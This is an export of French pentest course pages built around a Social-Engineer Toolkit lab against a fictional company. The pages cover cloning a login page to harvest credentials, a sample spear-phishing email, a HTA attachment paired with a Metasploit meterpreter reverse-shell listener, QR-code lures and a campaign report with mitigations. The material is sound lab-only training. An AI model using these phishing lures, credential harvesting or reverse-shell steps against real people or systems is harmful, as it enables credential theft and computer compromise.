[{"content":" 1. Introduction # Section 1 : Introduction au pentesting # Méthodologie et mise en place du pentest Définition du périmètre et des objectifs du test d’intrusion Les 4 étapes d’un pentest réussi Section 2 : Les différentes formes de pentest # Black Box White Box Grey Box Etude de cas : Proposer et analyser le scénario de chaque forme de pentest en se basant sur un cas fictif d’entreprise 2. Types et techniques de pentest # Section 1 : Réseau (interne, externe, wifi, IOT) =\u0026gt; Metasploitable 2 # Get Started Reconnaissance Scan vulns Exploitation Post-exploitation Findings Rapport Prise en main :\nManipulation des outils de reconnaissances (Nmap, Recon-ng et Shodan) Utilisation des outils scanners (OpenVAS et Nessus) Exploitation des vulnérabilités réseau (MSFVenom, Metasploit) Section 1 bis : Windows / Active Directory # Get Started — infra AD, outils, conventions du lab Pass the Hash — extraction NTLM (Mimikatz ou Impacket) et mouvement latéral Kerberoasting — à venir Section 2 : Web # Etudes pratiques à proposer Injection SQL, XSS, CSRF Manipulation des outils Burp Suite, sqlmap Section 3 : Social-engineering — SET (Social-Engineer Toolkit) # Get Started — infra lab, SET, cadre légal Credential Harvester — clone de page de login Spear Phishing — email ciblé + lien Payload HTA — pièce jointe + reverse shell QR Code / Smishing — QR vers harvester ou payload Rapport — synthèse campagne et recommandations Vecteurs privilégiés (fiables sur Windows / navigateurs récents) : harvester, phishing mail, HTA, QR. Drive-by et applets Java hors scope.\nSection 4 : Physique (ref team) # Etude de cas Section 5 : OSINT # Annexes # Étude de cas - compromission et tentative bloquée par EDR Étude de cas - compromission et tentative réussie grâce aux GPOs Étude de cas - au mauvais endroit au mauvais moment ","date":"3 June 2026","externalUrl":null,"permalink":"/learning/pentest/","section":"Learning","summary":"Parcours complet du test d’intrusion : méthodologie, reconnaissance et scan sur Metasploitable 2, exploitation, post-exploitation et rédaction de rapport. Pistes web, social engineering et OSINT.","title":"Pentest","type":"learning"},{"content":"Contenu à venir.\n","externalUrl":null,"permalink":"/learning/ad/","section":"Learning","summary":"Comprendre comment fonctionne un environnement Active Directory : forêts, domaines, utilisateurs, groupes, GPO, etc.","title":"Active Directory","type":"learning"},{"content":"Contenu à venir.\n","externalUrl":null,"permalink":"/learning/aws/","section":"Learning","summary":"Les bases d’Amazon Web Services : services essentiels, gestion des identités (IAM), bonnes pratiques de sécurité et erreurs de configuration fréquentes.","title":"AWS","type":"learning"},{"content":"Bienvenue sur Learning Labs — un espace pour apprendre la cybersécurité et l\u0026rsquo;infrastructure IT en pratiquant, pas seulement en lisant.\nChaque parcours suit une logique de terrain : comprendre le contexte, utiliser les bons outils, reproduire des scénarios réalistes dans un lab isolé, puis tirer des conclusions utiles (findings, rapport, bonnes pratiques). Vous avancez à votre rythme ; l\u0026rsquo;objectif est de comprendre ce que vous faites, pas d\u0026rsquo;accumuler des commandes par cœur.\nChoisissez un module ci-dessous pour commencer.\n","date":"17 June 2026","externalUrl":null,"permalink":"/learning/","section":"Learning","summary":"Choisissez un parcours : pentest, Active Directory ou AWS. Chaque module propose des labs guidés, de la théorie à la pratique.","title":"Learning","type":"learning"},{"content":"","date":"17 June 2026","externalUrl":null,"permalink":"/","section":"Learning Labs","summary":"","title":"Learning Labs","type":"page"},{"content":" Rapport de campagne — Social Engineering / LabCorp # Document de référence pour le module Social Engineering.\nMission fictive : LabCorp SAS — test de résilience « human factor » (spear phishing, harvester, HTA, QR).\nSegment lab : 192.168.56.0/24 — victime WS01 = 192.168.56.30.\nPrérequis : Credential Harvester, Spear Phishing, Payload HTA, QR Code.\nHarvester → Spear Phishing → HTA → QR → Synthèse findings → Rapport 1. Objectif du rapport # Public Attente RSSI / direction Taux de clic, risque métier, plan de sensibilisation Équipe IT / sécurité Vecteurs reproductibles, indicateurs, contrôles à renforcer Jury / enseignant Cohérence campagne SET → métriques → recommandations Durée atelier : 45 min (+ travail autonome).\nRestitution : 2 min oral / binôme — 1 slide ou 1 page max.\n2. Structure obligatoire # 2.1 Résumé exécutif (5–8 lignes) # Langage non technique — exemple de ton :\nSur la campagne de test LabCorp (segment lab), quatre vecteurs ont été déployés : fausse page VPN, email ciblé, pièce jointe HTA et QR code « Wi-Fi invité ». Deux employés simulés sur un ont cliqué et saisi leurs identifiants ; une session distante a été obtenue via HTA. Recommandation immédiate : déploiement MFA sur le VPN, module de signalement phishing et exercice de sensibilisation trimestriel.\n2.2 Périmètre \u0026amp; méthodologie # Rubrique Contenu type Type de test Campagne d\u0026rsquo;ingénierie sociale simulée (grey box) Périmètre WS01, messagerie interne lab, portail vpn.labcorp.local Hors scope Messagerie externe, O365 prod, réseaux étudiants Outils SET, Metasploit, Mailpit, swaks Vecteurs testés Harvester, spear phishing mail, HTA, QR RoE Pas d\u0026rsquo;envoi externe, pas d\u0026rsquo;exfiltration réelle 2.3 Tableau synthèse des findings # ID | Titre | Criticité | Vecteur | Taux succès lab | Priorité Minimum TP :\nID Titre Criticité Vecteur SE-01 Capture identifiants portail VPN Élevée Credential Harvester SE-02 Clic sur lien spear phishing Moyenne Email SE-03 Exécution pièce jointe HTA Critique HTA + Metasploit SE-04 Scan QR sans vérification URL Moyenne QR Code 2.4 Métriques de campagne # Indicateur Formule Exemple Taux d\u0026rsquo;ouverture Ouvertures / Emails envoyés 1/1 = 100 % Taux de clic Clics / Ouvertures 1/1 = 100 % Taux de saisie Saisies credentials / Clics 1/1 = 100 % Taux d\u0026rsquo;exécution HTA Sessions / HTA livrés 1/1 = 100 % Taux de scan QR Scans / QR exposés 1/1 = 100 % En lab avec une seule victime, les pourcentages sont indicatifs — l\u0026rsquo;important est la méthode de mesure.\n3. Détail par finding (fiche type) # SE-01 — Credential Harvester # Champ Contenu Description SET Site Cloner sur portail VPN factice ; identifiants transmis en clair au serveur attaquant Preuve Capture terminal SET + horodatage Impact Rejeu des identifiants sur VPN, OWA ou RDP ; chaîne vers AD si mot de passe réutilisé Correctifs MFA, FIDO2, pages login avec indicateur de sécurité, filtrage URL SE-03 — Payload HTA # Champ Contenu Description Fichier VPN_Update.hta exécuté par mshta.exe ; reverse shell meterpreter Preuve sessions -l Metasploit + getuid Impact Compromission complète du poste WS01 Correctifs Règles ASR (blocage HTA), EDR, blocage pièces jointes dangereuses, sensibilisation 4. Recommandations (minimum 5) # # Recommandation Effort Délai 1 MFA sur tous les accès distants (VPN, OWA) Moyen 30 j 2 Module « Signaler un phishing » dans la messagerie Faible 14 j 3 Campagne de sensibilisation + exercices simulés annuels Moyen 60 j 4 Règles ASR / blocage mshta en entreprise Moyen 30 j 5 Bannière sur emails externes + formation QR code Faible 30 j 5. Enchaînement avec le module AD (optionnel) # Si WS01 est joint au domaine lab.local :\nHarvester (credentials user1) → RDP / SMB → Mimikatz → Pass the Hash → DC01 Documenter dans le rapport si la réutilisation de mot de passe entre portail VPN et domaine a été testée.\n6. Grille d\u0026rsquo;évaluation # Critère Points Résumé exécutif clair /5 Métriques complètes (4 vecteurs) /5 Findings détaillés avec preuves /5 Recommandations priorisées /5 Cohérence avec les TPs SET /5 7. Suite de la démarche # Phase actuelle : Rapport — clôture du module Social Engineering.\n[✓] Mise en place → [✓] Harvester → [✓] Spear Phishing → [✓] HTA → [✓] QR → [✓] Rapport Pistes complémentaires :\nPass the Hash — réutiliser les credentials capturés Module OSINT (à venir) — préparation d\u0026rsquo;un spear phishing plus ciblé Références :\nNIST SP 800-50 — Building an Information Technology Security Awareness and Training Program MITRE ATT\u0026amp;CK — Initial Access ","date":"17 June 2026","externalUrl":null,"permalink":"/learning/pentest/social-engineering/report/","section":"Learning","summary":"","title":"Rapport","type":"learning"},{"content":"","date":"17 June 2026","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"},{"content":"","date":"17 June 2026","externalUrl":null,"permalink":"/series/social-engineering/","section":"Series","summary":"","title":"Social-Engineering","type":"series"},{"content":" QR Code / Smishing # TP du module Social Engineering : générer un QR code avec SET pointant vers le Credential Harvester ou vers le téléchargement du payload HTA, simuler un scénario smishing (phishing par SMS) ou affiche physique (Wi-Fi invité).\nPrérequis : harvester ou serveur HTTP avec payload déjà en place.\nImportant : le QR encode une URL interne au lab uniquement (192.168.56.10 ou vpn.labcorp.local).\n1. Rappel — QR code et smishing # Concept Détail QR code phishing QR imprimé ou envoyé par message ; la victime scanne sans voir l\u0026rsquo;URL complète Smishing Phishing par SMS — « Votre colis », « Compte bloqué », « Wi-Fi invité » Vecteur SET QRCode Generator Attack Vector MITRE T1566.002 — Spearphishing Link (canal différent, même objectif) Pourquoi ce TP : les QR codes sont omniprésents (restaurants, parking, événements). L\u0026rsquo;URL est masquée — l\u0026rsquo;utilisateur ne vérifie pas le domaine avant d\u0026rsquo;ouvrir.\n2. Générer le QR code avec SET # sudo setoolkit 1) Social-Engineering Attacks 5) QRCode Generator Attack Vector (Le numéro peut varier — chercher « QRCode » dans le menu.)\nInvite Valeur URL à encoder http://192.168.56.10/ (harvester actif) Alternative http://192.168.56.10:8888/VPN_Update.hta (payload HTA) SET génère une image PNG (chemin affiché à l\u0026rsquo;écran, souvent sous /root/.set/).\nsudo ls -la /root/.set/*.png sudo cp /root/.set/*.png /tmp/labcorp-qr.png Afficher ou imprimer le QR pour le TP :\nxdg-open /tmp/labcorp-qr.png 3. Scénarios pédagogiques # Choisir un scénario par binôme :\nScénario A — Affiche « Wi-Fi invité LabCorp » # Créer une affiche factice (texte + QR) :\n┌─────────────────────────────────────┐ │ Wi-Fi invité — LabCorp │ │ Scannez pour vous connecter │ │ [ QR CODE ] │ └─────────────────────────────────────┘ Placer l\u0026rsquo;image sur le bureau de WS01 ou l\u0026rsquo;afficher en plein écran depuis Kali.\nScénario B — Smishing simulé # Rédiger un faux SMS (document texte ou slide) :\nLabCorp Livraison : votre colis est en attente. Scannez le QR ou ouvrez : http://vpn.labcorp.local/ En lab, la victime « reçoit » le message via un fichier .txt sur le bureau — pas d\u0026rsquo;envoi SMS réel.\n4. Côté victime # Sur WS01, ouvrir l\u0026rsquo;appareil photo ou une app QR (ou utiliser un smartphone sur le même Wi-Fi host-only si disponible) Scanner le QR affiché depuis Kali (partage d\u0026rsquo;écran, impression, ou copie du PNG sur WS01) Transférer le PNG sur WS01 pour simplifier :\n# Depuis Kali python3 -m http.server 9999 # WS01 : télécharger http://192.168.56.10:9999/labcorp-qr.png Suivre le lien ouvert — harvester ou téléchargement HTA Noter si la victime saisit ses identifiants ou ouvre le HTA 5. Mesure et comparaison des vecteurs # Remplir le tableau comparatif (base pour le rapport) :\nVecteur Taux de succès (lab) Friction utilisateur Détection probable Credential Harvester (lien direct) Faible Proxy / URL filtering Spear Phishing (email) Moyenne SEG / bannière HTA (pièce jointe) Élevée EDR / SmartScreen QR Code Très faible (URL cachée) Difficile sans sensibilisation 6. Grille de TP # # Tâche Critère de réussite 1 Générer un QR via SET Fichier PNG valide 2 Scénario documenté Affiche ou smishing fictif 3 Scan réussi sur WS01 Ouverture de l\u0026rsquo;URL encodée 4 Capture ou shell obtenu Identifiants ou session meterpreter 5 Comparer avec email Au moins 2 différences expliquées 7. Suite de la démarche # Phase actuelle : QR Code / Smishing — livraison du lien sans affichage de l\u0026rsquo;URL.\n[✓] Mise en place → [✓] Harvester → [✓] Spear Phishing → [✓] HTA → [✓] QR → [●] Rapport Étape suivante : Rapport — synthèse de la campagne et recommandations de sensibilisation.\nRéférences :\nFBI IC3 — Quishing alerts MITRE T1566 ","date":"17 June 2026","externalUrl":null,"permalink":"/learning/pentest/social-engineering/qr-smishing/","section":"Learning","summary":"","title":"QR Code / Smishing","type":"learning"},{"content":" Payload HTA # TP du module Social Engineering : générer une pièce jointe HTA (HTML Application) avec SET, coupler un listener Metasploit, et obtenir un shell sur WS01 lorsque la victime ouvre le fichier.\nPrérequis : lab et SMTP mail opérationnels — voir Get Started et Spear Phishing.\nImportant : le fichier HTA exécute du code sur la machine victime. Restaurer le snapshot WS01 après le TP.\n1. Rappel — pourquoi le vecteur HTA ? # Concept Détail HTA Fichier .hta exécuté par mshta.exe — traité comme une application locale, pas une page web Intérêt Contourne les anciens drive-by ; fonctionne encore en lab sur Windows 10/11 si l\u0026rsquo;utilisateur ouvre la pièce jointe Vecteur SET Website Attack Vectors → HTA Attack Method ou Spear-Phishing avec génération HTA MITRE T1204.002 — User Execution: Malicious File, T1059.005 — Visual Basic Les applets Java et exploits navigateur automatiques sont obsolètes ; le HTA reste un vecteur pédagogique pertinent pour illustrer « l\u0026rsquo;utilisateur a ouvert la pièce jointe ».\n2. Préparer le listener Metasploit # Terminal 1 — sur Kali :\nmsfconsole -q use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.56.10 set LPORT 4444 set ExitOnSession false run -j Vérifier que le job écoute :\njobs 3. Générer le payload HTA avec SET # Terminal 2 — sur Kali :\nsudo setoolkit 1) Social-Engineering Attacks 2) Website Attack Vectors 7) HTA Attack Method (Le numéro du menu HTA peut varier selon la version SET — chercher « HTA » dans la liste.)\nInvite Valeur IP du listener 192.168.56.10 Port du listener 4444 Nom du fichier généré VPN_Update.hta (défaut ou personnalisé) SET place le fichier dans son répertoire de sortie (souvent /root/.set/ ou chemin affiché à l\u0026rsquo;écran).\nsudo ls -la /root/.set/ sudo cp /root/.set/VPN_Update.hta /tmp/VPN_Update.hta sudo chmod 644 /tmp/VPN_Update.hta Servir le fichier pour téléchargement ou pièce jointe :\ncd /tmp \u0026amp;\u0026amp; python3 -m http.server 8888 4. Livrer le HTA à la victime # Option A — Pièce jointe email (spear phishing) # Avec swaks et Mailpit :\nswaks --to user1@labcorp.local \\ --from it-support@labcorp.local \\ --server 192.168.56.10 --port 1025 \\ --header \u0026#34;Subject: Mise à jour VPN — action requise\u0026#34; \\ --body \u0026#34;Veuillez exécuter la mise à jour jointe sur votre poste.\u0026#34; \\ --attach /tmp/VPN_Update.hta Option B — Téléchargement manuel (TP simplifié) # Sur WS01, ouvrir Edge et télécharger :\nhttp://192.168.56.10:8888/VPN_Update.hta 5. Exécution côté victime # Sur WS01, ouvrir le fichier VPN_Update.hta (double-clic — comportement victime simulé) Une invite ou une fenêtre peut s\u0026rsquo;afficher brièvement Sur Kali, vérifier la session Metasploit : sessions -l sessions -i 1 Dans le meterpreter :\ngetuid sysinfo Preuve de succès :\nServer username: WS01\\user1 OS : Windows 10/11 ... 6. Dépannage # Problème Piste Pas de session Vérifier LHOST = IP host-only, pas NAT ; pare-feu WS01 désactivé Fichier bloqué Télécharger via HTTP plutôt qu\u0026rsquo;en pièce jointe ; SmartScreen désactivé en lab Port 4444 fermé ss -tlnp | grep 4444 sur Kali HTA non généré Mettre à jour SET : sudo apt update \u0026amp;\u0026amp; sudo apt install --reinstall set 7. Grille de TP # # Tâche Critère de réussite 1 Listener Metasploit actif jobs affiche le handler 2 Générer le HTA via SET Fichier .hta présent 3 Livrer le fichier à WS01 Email ou téléchargement documenté 4 Obtenir une session sessions -l non vide 5 Proposer 2 mitigations Blocage HTA (ASR), formation pièces jointes, EDR, macro/LOLBins 8. Suite de la démarche # Phase actuelle : Payload HTA — exécution de code via pièce jointe.\n[✓] Mise en place → [✓] Harvester → [✓] Spear Phishing → [✓] HTA → [●] QR → [ ] Rapport Étape suivante : QR Code / Smishing — même harvester ou payload, livré via un QR code.\nRéférences :\nMITRE T1218.005 — Mshta Metasploit Unleashed — Handlers ","date":"17 June 2026","externalUrl":null,"permalink":"/learning/pentest/social-engineering/hta-payload/","section":"Learning","summary":"","title":"Payload HTA","type":"learning"},{"content":" Spear Phishing # TP du module Social Engineering : rédiger un email de spear phishing crédible, l\u0026rsquo;envoyer à la victime via un relais SMTP interne au lab, et mesurer si user1 clique sur le lien vers le Credential Harvester.\nPrérequis : harvester SET configuré et testé — pages Get Started et Credential Harvester.\nImportant : n\u0026rsquo;envoyer des emails qu\u0026rsquo;aux adresses du lab (@labcorp.local). Aucun envoi vers Gmail, Outlook personnel ou messagerie de l\u0026rsquo;établissement.\n1. Rappel — spear phishing # Concept Détail Phishing Email frauduleux incitant à cliquer, ouvrir une pièce jointe ou divulguer des informations Spear phishing Version ciblée : l\u0026rsquo;email mentionne l\u0026rsquo;entreprise, un collègue, un contexte métier Vecteur SET Spear-Phishing Attack Vector — génération de modèles et couplage payload / lien MITRE T1566.001 — Spearphishing Attachment, T1566.002 — Spearphishing Link Ce TP couvre le lien (vers harvester). La pièce jointe HTA est traitée dans le TP Payload HTA.\n2. Préparer le relais mail (Mailpit) # Sur Kali, avec Docker :\ndocker run -d --name mailpit --restart unless-stopped \\ -p 8025:8025 -p 1025:1025 \\ axllent/mailpit Service URL / port Web UI (lire les mails) http://192.168.56.10:8025 SMTP (envoi) 192.168.56.10:1025 — pas d\u0026rsquo;authentification en lab Configurer un client mail sur WS01 (Thunderbird ou Mail de Windows) :\nParamètre Valeur Compte user1@labcorp.local SMTP 192.168.56.10, port 1025 IMAP (Mailpit) 192.168.56.10, port 1143 si activé — sinon consulter via la Web UI En TP simplifié, la victime lit l\u0026rsquo;email directement dans la Web UI Mailpit depuis WS01 — pas besoin de client mail configuré.\n3. Option A — Email via SET (Spear-Phishing Attack Vector) # sudo setoolkit 1) Social-Engineering Attacks 2) Spear-Phishing Attack Vectors Choisir selon le menu affiché :\nLien vers site (couplé au harvester déjà en place), ou Génération de fichier (reporté au TP HTA) Pour un email avec lien :\nInvite Valeur SMTP 192.168.56.10 Port SMTP 1025 Expéditeur it-support@labcorp.local Destinataire user1@labcorp.local Lien http://vpn.labcorp.local/ ou http://192.168.56.10/ Objet et corps suggérés (à personnaliser) :\nObjet : [Action requise] Mise à jour certificat VPN LabCorp Bonjour, Le certificat du portail VPN expire ce soir. Merci de vous reconnecter via le lien ci-dessous avant 18h pour éviter toute interruption : http://vpn.labcorp.local/ Cordialement, Équipe Support IT — LabCorp 4. Option B — Email manuel avec swaks (alternative pédagogique) # Si le module email de SET est capricieux sur votre version :\nsudo apt install swaks swaks --to user1@labcorp.local \\ --from it-support@labcorp.local \\ --server 192.168.56.10 --port 1025 \\ --header \u0026#34;Subject: [Action requise] Mise à jour certificat VPN LabCorp\u0026#34; \\ --body \u0026#34;Bonjour, merci de mettre à jour votre session VPN : http://vpn.labcorp.local/\u0026#34; Vérifier la réception dans Mailpit : http://192.168.56.10:8025\n5. Côté victime — mesurer le clic # Sur WS01, ouvrir la Web UI Mailpit ou le client mail Lire l\u0026rsquo;email — noter l\u0026rsquo;heure Cliquer sur le lien (comportement victime simulé) Saisir les identifiants sur le harvester SET (si encore actif) Indicateurs à documenter :\nMétrique Valeur Emails envoyés 1 Emails ouverts oui / non Clic sur le lien oui / non Identifiants saisis oui / non Délai entre envoi et clic ex. 4 min 6. Analyse — signaux d\u0026rsquo;alerte manqués # Demander au binôme d\u0026rsquo;identifier dans l\u0026rsquo;email fictif :\nSignal d\u0026rsquo;alerte Présent dans l\u0026rsquo;email lab ? Domaine expéditeur suspect @labcorp.local — crédible en interne URL différente du portail habituel http au lieu de https, IP nue Urgence artificielle « expire ce soir » Absence de signature corporate standard Support générique 7. Grille de TP # # Tâche Critère de réussite 1 Relais SMTP lab opérationnel Email visible dans Mailpit 2 Rédiger un spear phishing crédible Objet + corps contextualisés LabCorp 3 Lien vers harvester fonctionnel Clic mène à la page SET 4 Tableau de métriques rempli Ouverture / clic / saisie documentés 5 Proposer 2 mitigations SPF/DKIM/DMARC, bannière externe, signalement phishing 8. Suite de la démarche # Phase actuelle : Spear Phishing — livraison par email d\u0026rsquo;un lien malveillant.\n[✓] Mise en place → [✓] Harvester → [✓] Spear Phishing → [●] HTA → [ ] QR → [ ] Rapport Étape suivante : Payload HTA — même scénario email, mais avec une pièce jointe exécutable (vecteur fiable sur Windows).\nRéférences :\nMITRE T1566 — Phishing Mailpit ","date":"17 June 2026","externalUrl":null,"permalink":"/learning/pentest/social-engineering/spear-phishing/","section":"Learning","summary":"","title":"Spear Phishing","type":"learning"},{"content":" Credential Harvester # TP du module Social Engineering : utiliser le Credential Harvester de SET pour cloner une page de connexion, rediriger la victime et capturer ses identifiants.\nPrérequis : lab opérationnel — voir Get Started.\nImportant : ne cloner que des pages hébergées dans le lab (portail LabCorp local). Ne jamais utiliser ce TP contre des sites réels sans autorisation écrite.\n1. Rappel — qu\u0026rsquo;est-ce que le Credential Harvester ? # Concept Détail Credential Harvester Module SET qui sert une fausse page de login et enregistre username / password Site Cloner SET copie le HTML d\u0026rsquo;une URL accessible depuis Kali Redirection Après saisie, la victime est renvoyée vers le vrai site (ou une page « maintenance ») MITRE T1556 — Modify Authentication Process, T1056 — Input Capture Pourquoi ce vecteur en priorité : il ne repose pas sur un exploit navigateur. Il teste directement si l\u0026rsquo;employé saisit ses identifiants sur une page non légitime — scénario très fréquent en entreprise (VPN, OWA, SSO).\n2. Préparer la cible à cloner # Sur Kali, servir la page modèle LabCorp (si pas déjà fait) :\ncd /var/www/labcorp sudo python3 -m http.server 8080 Vérifier depuis Kali :\ncurl -s http://127.0.0.1:8080/login.html | head -5 URL à indiquer à SET : http://192.168.56.10:8080/login.html\n3. Lancer le Credential Harvester # sudo setoolkit Navigation dans le menu SET :\n1) Social-Engineering Attacks 2) Website Attack Vectors 3) Credential Harvester Attack Method 2) Site Cloner Réponses aux invites :\nInvite SET Valeur exemple IP pour le reverse payload / serveur 192.168.56.10 URL à cloner http://192.168.56.10:8080/login.html Texte de redirection post-capture https://www.microsoft.com (ou page maintenance LabCorp) SET démarre un serveur web (souvent port 80 ou 443). Noter le port affiché.\nSi le port 80 est occupé : arrêter Apache (sudo systemctl stop apache2) ou choisir un autre vecteur du menu SET proposant un port personnalisé.\n4. Côté victime (WS01) # Ouvrir Edge ou Chrome sur WS01 Naviguer vers l\u0026rsquo;URL du harvester : http://192.168.56.10/ (Ou http://vpn.labcorp.local/ si le fichier hosts pointe vers Kali et SET écoute sur le port 80.)\nSaisir les identifiants de test : Identifiant : user1 Mot de passe : Summer2024! Valider — la page redirige vers le site configuré 5. Récupérer les credentials capturés # Dans le terminal SET, les identifiants apparaissent en clair :\n[*] WE GOT A HIT! PRINTING THE OUTPUT: [*] PARAMETER NAME: username VALUE: user1 [*] PARAMETER NAME: password VALUE: Summer2024! Fichiers de log SET (selon version) :\nsudo ls -la /root/.set/reports/ sudo cat /root/.set/reports/*.txt 2\u0026gt;/dev/null | tail -20 Livrable : capture d\u0026rsquo;écran du terminal SET + copie des identifiants capturés (masquer partiellement le mot de passe dans le rapport final si demandé par le formateur).\n6. Variante — harvester + autorité de nom local # Pour un scénario plus réaliste sans modifier le fichier hosts sur chaque poste :\nUtiliser vpn.labcorp.local dans l\u0026rsquo;email de phishing (TP suivant) Résolution DNS uniquement via hosts sur WS01 — en production, un attaquant utiliserait un domaine lookalike ; en lab, le fichier hosts simule cette résolution 7. Grille de TP # # Tâche Critère de réussite 1 Servir la page modèle LabCorp curl ou navigateur affiche le formulaire 2 Configurer SET Site Cloner Serveur SET actif sans erreur 3 Capturer les identifiants user1 visible dans la sortie SET 4 Expliquer le mécanisme Différence clone / reverse proxy / phishing 5 Proposer 2 mitigations MFA, formation, filtrage URL, signalement 8. Suite de la démarche # Phase actuelle : Credential Harvester — capture d\u0026rsquo;identifiants via fausse page de login.\n[✓] Mise en place → [✓] Credential Harvester → [●] Spear Phishing → [ ] HTA → [ ] QR → [ ] Rapport Étape suivante : Spear Phishing — envoyer un email ciblé à user1 avec un lien vers ce harvester.\nEnchaînement AD (optionnel) : identifiants capturés → authentification SMB ou RDP → Pass the Hash si WS01 est joint au domaine lab.local.\nRéférences :\nMITRE T1566.002 — Spearphishing Link SET Wiki — Credential Harvester ","date":"17 June 2026","externalUrl":null,"permalink":"/learning/pentest/social-engineering/credential-harvester/","section":"Learning","summary":"","title":"Credential Harvester","type":"learning"},{"content":" Mise en place du lab — Social Engineering avec SET # Guide de démarrage pour le module Social Engineering du parcours pentest : environnement isolé, outil SET (Social-Engineer Toolkit), scénario entreprise fictive LabCorp. Les vecteurs d\u0026rsquo;attaque (harvester, phishing mail, HTA, QR) sont traités dans des pages dédiées, sur la même infrastructure.\nL\u0026rsquo;objectif est de disposer d\u0026rsquo;un lab isolé, reproductible et hors production, réutilisable pour l\u0026rsquo;ensemble des TPs de ce module.\nImportant : ce module manipule des techniques d\u0026rsquo;ingénierie sociale réelles. Ne jamais l\u0026rsquo;exposer sur Internet, envoyer de vrais emails vers des adresses externes, ni cloner des sites de production accessibles publiquement. Utiliser uniquement des VMs du lab et des pages hébergées en interne.\n1. Parcours du module # Une fois l\u0026rsquo;infrastructure en place, enchaînez les TPs dans l\u0026rsquo;ordre :\n# Page Vecteur SET Statut 1 Get Started (cette page) Infra, SET, cadre légal — 2 Credential Harvester Clone de page de login + capture d\u0026rsquo;identifiants Disponible 3 Spear Phishing Email ciblé + lien vers le harvester Disponible 4 Payload HTA Pièce jointe HTA + reverse shell Metasploit Disponible 5 QR Code / Smishing QR pointant vers le harvester ou le payload Disponible 6 Rapport Synthèse campagne + recommandations Disponible Vecteurs privilégiés dans ce module (fiables sur navigateurs et Windows récents) :\nVecteur Pourquoi le retenir Credential Harvester Ne dépend pas d\u0026rsquo;un exploit navigateur ; mesure la vigilance humaine Spear Phishing (mail) Scénario le plus proche d\u0026rsquo;un pentest « human factor » réel HTA Livraison de payload Windows sans applet Java ni drive-by obsolète QR Code Vecteur moderne (affiches, Wi-Fi invité, SMS simulé) Les exploits navigateur automatiques (Java applet, anciens drive-by) sont hors scope — souvent bloqués ou inopérants sur Edge/Chrome récents.\nBonus (non couvert en détail) : Infectious Media Generator (clé USB « Lost \u0026amp; Found ») — même infra, même logique de payload que le TP HTA.\nTous les TPs partagent Kali et WS01 décrits ci-dessous. Le module Active Directory peut réutiliser les mêmes machines : credentials volés par harvester → Pass the Hash.\n2. Architecture cible du lab # Réseau recommandé : Host-only (VirtualBox) ou LAN segmenté (VMware) — segment 192.168.56.0/24, sans passerelle vers l\u0026rsquo;extérieur pour les VMs cibles.\nConserver un adaptateur NAT sur Kali uniquement pour les mises à jour.\nMachine Rôle IP (exemple) OS Kali Attaquant (SET, Metasploit, serveur web SET, SMTP lab) 192.168.56.10 Kali Linux (VM) WS01 Victime — poste employé LabCorp 192.168.56.30 Windows 10/11 Pro Eval MAIL01 (optionnel) Boîte mail interne de test 192.168.56.40 Mailpit (Docker) ou Postfix minimal Domaine fictif : labcorp.local (ou réutilisation de lab.local si vous avez déjà le module AD)\nScénario pédagogique :\nEmployé user1 sur WS01 consulte sa messagerie et un portail VPN interne Portail factice : https://vpn.labcorp.local → résolu vers Kali (fichier hosts sur WS01) Mot de passe volontairement faible pour mesurer l\u0026rsquo;impact : Summer2024! Windows Defender et pare-feu désactivés sur le segment lab uniquement 3. Téléchargements et outils # VM / outil Source Remarque Kali Linux https://www.kali.org/get-kali/ SET préinstallé : setoolkit Windows 10/11 Eval https://www.microsoft.com/evalcenter Poste victime WS01 Mailpit https://github.com/axllent/mailpit Web UI + SMTP local (port 1025) Metasploit Inclus dans Kali Listeners couplés au SET Alternative victime : réutiliser WS01 du lab Active Directory — adapter les noms de domaine (lab.local ↔ labcorp.local) dans les pages du module.\n4. Préparation de l\u0026rsquo;environnement # 4.1. Sur Kali # Vérifier que SET est installé : which setoolkit setoolkit --version Si absent : sudo apt update \u0026amp;\u0026amp; sudo apt install set\nConfigurer l\u0026rsquo;IP statique sur l\u0026rsquo;interface host-only : 192.168.56.10/24\n(Optionnel) Lancer Mailpit pour le TP phishing :\n# Avec Docker docker run -d --name mailpit --network host axllent/mailpit # Web UI : http://192.168.56.10:8025 — SMTP : port 1025 4.2. Sur WS01 (victime) # Installer Windows 10/11 Eval IP statique : 192.168.56.30, masque 255.255.255.0, pas de passerelle Renommer la machine en WS01 Créer un compte local user1 / Summer2024! (ou joindre le domaine AD existant) Ajouter l\u0026rsquo;entrée DNS locale pour le portail factice (PowerShell admin) : Add-Content -Path C:\\Windows\\System32\\drivers\\etc\\hosts -Value \u0026#34;192.168.56.10 vpn.labcorp.local intranet.labcorp.local\u0026#34; Désactiver Defender et pare-feu uniquement dans le lab 4.3. Page modèle pour le harvester (INTRA01 local) # Sur Kali, créer une page de login simple à cloner ou à servir comme référence :\nsudo mkdir -p /var/www/labcorp sudo tee /var/www/labcorp/login.html \u0026lt;\u0026lt; \u0026#39;EOF\u0026#39; \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html lang=\u0026#34;fr\u0026#34;\u0026gt; \u0026lt;head\u0026gt;\u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt;\u0026lt;title\u0026gt;LabCorp VPN\u0026lt;/title\u0026gt;\u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;h1\u0026gt;Portail VPN LabCorp\u0026lt;/h1\u0026gt; \u0026lt;form method=\u0026#34;post\u0026#34; action=\u0026#34;login.php\u0026#34;\u0026gt; \u0026lt;label\u0026gt;Identifiant\u0026lt;/label\u0026gt;\u0026lt;input name=\u0026#34;username\u0026#34; type=\u0026#34;text\u0026#34;\u0026gt;\u0026lt;br\u0026gt; \u0026lt;label\u0026gt;Mot de passe\u0026lt;/label\u0026gt;\u0026lt;input name=\u0026#34;password\u0026#34; type=\u0026#34;password\u0026#34;\u0026gt;\u0026lt;br\u0026gt; \u0026lt;button type=\u0026#34;submit\u0026#34;\u0026gt;Connexion\u0026lt;/button\u0026gt; \u0026lt;/form\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; EOF SET pourra cloner cette page via son propre serveur intégré ; le fichier ci-dessus sert de cible « entreprise » réaliste sans toucher à un vrai site.\n5. Test de l\u0026rsquo;environnement # Depuis Kali :\nping -c 2 192.168.56.30 Depuis WS01 (navigateur) :\nhttp://192.168.56.10/ → doit répondre (ou sera servi par SET au TP 2) Lancer SET pour vérifier le menu :\nsudo setoolkit # Choisir 1) 